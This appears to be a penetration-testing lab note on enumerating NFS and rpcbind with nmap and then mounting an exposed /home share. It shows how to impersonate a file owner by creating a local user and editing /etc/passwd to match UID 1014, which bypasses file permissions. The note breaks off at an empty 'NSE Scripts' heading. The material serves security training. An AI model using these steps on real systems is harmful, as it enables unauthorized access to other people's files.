Background:

Network File System: allows a user on a client computer to access files over a computer network as if they were on locally-mounted storage.

Portmapper and RPCbind: run on TCP port 111. RPCbind maps RPC services to the ports on which they listen. RPC processes notify rpcbind when they start, registering the ports they are listening on and the RPC program numbers they expect to serve. The client system then contacts rpcbind on the server with a particular RPC program number. The rpcbind service redirects the client to the proper port number (often TCP port 2049) so it can communicate with the requested service. We can scan these ports with nmap using the following syntax below.

Scans:

Scan for NFS open: #nmap -v -p 111 10.11.1.1-254 Rpcinfo to find services that may have registered with rpcbind: #nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254 NMAP NSE for NFS: #nmap -p 111 --script nfs* 10.11.1.72

If we get a result like this where we have a directory we can mount then the synax is: #mount -o noclock 10.11.1.72:/home ~/home/ //-o nolock is used to disable file locking #cd home/ && ls

We got denied the file read so we decide to try and add a user with the same UUID of 1014. #sudo adduser pwn //we automatically got assigned the 1001 user so we will need to change it to 1014 to read the file. #sudo sed -i -e 's/1001/1014/g' /etc/passwd //-i inline replace, -e execute script check with: #cat /etc/passwd | grep pwn #su pwn #id

NSE Scripts: